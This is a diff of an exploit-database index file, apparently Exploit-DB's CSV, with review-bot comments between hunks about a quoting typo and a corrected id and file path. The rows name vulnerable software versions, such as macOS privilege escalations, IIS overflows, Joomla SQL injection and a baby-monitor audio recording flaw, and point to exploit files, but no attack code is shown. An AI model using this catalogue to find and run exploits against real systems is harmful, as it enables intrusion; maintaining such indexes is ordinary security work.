44234,exploits/macos/local/44234.c,"Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak",2017-12-07,"Brandon Azad",local,macos,
|
||||
44237,exploits/macos/local/44237.md,"Apple macOS Sierra 10.12.1 - 'physmem' Local Privilege Escalation",2017-01-16,"Brandon Azad",local,macos,
|
||||
44239,exploits/osx/local/44239.md,"Apple OS X 10.10.5 - 'rootsh' Local Privilege Escalation",2016-05-16,"Brandon Azad",local,osx,
|
||||
44243,exploits/windows/local/44243.pl,"Xion 1.0.125 - '.m3u' Local SEH-Based Unicode Venetian Exploit",2018-03-05,synthetic,local,windows,
|
||||
44244,exploits/windows/local/44244.py,"Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow",2018-03-05,bzyo,local,windows,
|
||||
44246,exploits/linux/local/44246.txt,"Sophos UTM 9.410 - 'loginuser' 'confd' Service Privilege Escalation",2018-03-05,KoreLogic,local,linux,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
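Review bot: the new 44244 row names the affected field as 'Share Username', while the script header in this same commit titles it only "Local Buffer Overflow" and step 3 of its PoC calls the field "User Name"; align the three so a search on either term finds the entry.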
|
@ -16292,6 +16297,8 @@ id,file,description,date,author,type,platform,port
|
|||
44227,exploits/php/remote/44227.php,"Joomla! 3.7 - SQL Injection",2017-07-04,"Manish Tanwar",remote,php,
|
||||
44228,exploits/php/remote/44228.php,"Posnic Stock Management System - SQL Injection",2017-02-03,"Manish Tanwar",remote,php,
|
||||
44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php,
|
||||
44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android,
|
||||
44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -38557,7 +38564,7 @@ id,file,description,date,author,type,platform,port
|
|||
42585,exploits/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",webapps,php,
|
||||
42588,exploits/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",webapps,hardware,
|
||||
42589,exploits/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",webapps,php,
|
||||
42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",webapps,php,
|
||||
42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC)",2017-08-30,"Ihsan Sencan",webapps,php,
|
||||
42591,exploits/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,webapps,php,
|
||||
42592,exploits/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",webapps,php,
|
||||
42595,exploits/php/webapps/42595.txt,"PHP-SecureArea < 2.7 - Multiple Vulnerabilities",2017-08-30,Cryo,webapps,php,
|
||||
|
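Review bot: the rewritten 42590 description carries a stray space inside the quotes (`' com_Joomanager'`); it should read `'com_Joomanager'`, matching the quoting style of the surrounding rows such as `'cache'` and `'ptrace/kmod'`. The same typo appears in the new 44252 row later in this diff, so fix both.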
@ -38952,4 +38959,6 @@ id,file,description,date,author,type,platform,port
|
|||
44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl,
|
||||
44219,exploits/hardware/webapps/44219.txt,"D-Link DIR-600M Wireless - Cross-Site Scripting",2018-03-02,"Prasenjit Kanti Paul",webapps,hardware,
|
||||
44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,
|
||||
442321,exploits/windows/webapps/442321.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows,
|
||||
44241,exploits/windows/webapps/44241.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows,
|
||||
44250,exploits/php/webapps/44250.txt,"ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection",2018-03-05,"SEC Consult",webapps,php,80
|
||||
44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php,
|
||||
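Review bot: the 44241 row replaces the mistyped 442321 row with identical description, date and author, so the intent is an id/path correction; verify that `exploits/windows/webapps/44241.txt` actually exists in this commit, since the CSV change alone does not move the file and a stale path breaks `searchsploit -m`. The 44252 row also repeats the `' com_Joomanager'` leading-space typo.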